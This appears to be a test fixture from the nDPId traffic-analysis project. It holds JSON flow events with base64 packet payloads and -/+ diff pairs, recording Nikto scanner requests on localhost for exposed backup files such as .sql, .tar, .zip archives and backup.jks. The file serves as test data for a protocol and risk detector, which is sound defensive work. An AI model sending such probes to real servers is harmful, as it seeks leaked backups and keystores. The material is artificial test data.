{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 